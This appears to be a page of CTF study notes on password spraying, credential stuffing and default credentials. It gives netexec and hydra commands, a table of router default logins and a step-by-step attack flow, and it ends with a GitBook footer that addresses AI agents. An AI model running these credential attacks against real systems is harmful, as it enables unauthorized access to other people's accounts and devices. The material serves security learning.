> For the complete documentation index, see [llms.txt](https://capcap-1.gitbook.io/capcap/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://capcap-1.gitbook.io/capcap/readme/ctf-modules/exploitation/password-attacks/password-spraying-credential-stuffing-and-default-credentials.md).

# Password Spraying, Credential Stuffing & Default Credentials

[#references-link](#references-link "mention")

<https://raw.githubusercontent.com/ihebski/DefaultCreds-cheat-sheet/main/DefaultCreds-Cheat-Sheet.csv>

### Password Spraying

Testing **one password against many users**. Effective when admins set default passwords for new accounts that users forget to change.

Unlike brute-force (many passwords → one user), spraying avoids account lockout by staying under the threshold per user.

```bash
# Spray one password across all users on a subnet
netexec smb 10.100.38.0/24 -u usernames.list -p 'ChangeMe123!'

# Spray across Active Directory
netexec smb <DC-IP> -u usernames.list -p 'ChangeMe123!' --continue-on-success
```

**Tools by target:**

| Target           | Tool               |
| ---------------- | ------------------ |
| Web applications | Burp Suite         |
| Active Directory | NetExec / Kerbrute |
| Network services | Hydra / NetExec    |

> **Real scenario:** Admin sets up 50 new accounts all with `ChangeMe123!`. You spray it — even if 2 users never changed it, you're in.

***

### Credential Stuffing

Using **leaked username:password pairs** from one breach to attack other services. Works because \~66% of users reuse passwords across platforms.

```bash
# -C flag = combo list (username:password format)
hydra -C user_pass.list ssh://10.100.38.23

# user_pass.list format:
# john:password123
# admin:letmein
# user:qwerty
```

**Difference from spraying:**

|        | Password Spraying              | Credential Stuffing    |
| ------ | ------------------------------ | ---------------------- |
| Input  | Many users + one password      | Leaked user:pass pairs |
| Source | Guessed/default passwords      | Breach databases       |
| Goal   | Find who didn't change default | Find password reuse    |

***

### Default Credentials

Many devices ship with default credentials admins forget to change — routers, firewalls, databases, IoT devices.

#### defaultcreds-cheat-sheet

```bash
# Install
pip3 install defaultcreds-cheat-sheet

# Search by product/vendor
creds search linksys
creds search cisco
creds search apache
```

#### Common router defaults

| Brand   | Default IP  | Username | Password |
| ------- | ----------- | -------- | -------- |
| 3Com    | 192.168.1.1 | admin    | Admin    |
| Belkin  | 192.168.2.1 | admin    | admin    |
| D-Link  | 192.168.0.1 | admin    | Admin    |
| Linksys | 192.168.1.1 | admin    | Admin    |
| Netgear | 192.168.0.1 | admin    | password |

#### Attack flow

```bash
# 1. Identify product on target network
# 2. Search default creds
creds search <product>

# 3. Build combo list and stuff
hydra -C default_creds.list ssh://10.100.38.23
hydra -C default_creds.list ftp://10.100.38.23
```

***

### Summary

| Technique           | What it is                         | Tool            |
| ------------------- | ---------------------------------- | --------------- |
| Password spraying   | One password → many users          | NetExec / Hydra |
| Credential stuffing | Leaked pairs → other services      | Hydra `-C`      |
| Default credentials | Known defaults → unchanged devices | `creds` + Hydra |


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://capcap-1.gitbook.io/capcap/readme/ctf-modules/exploitation/password-attacks/password-spraying-credential-stuffing-and-default-credentials.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
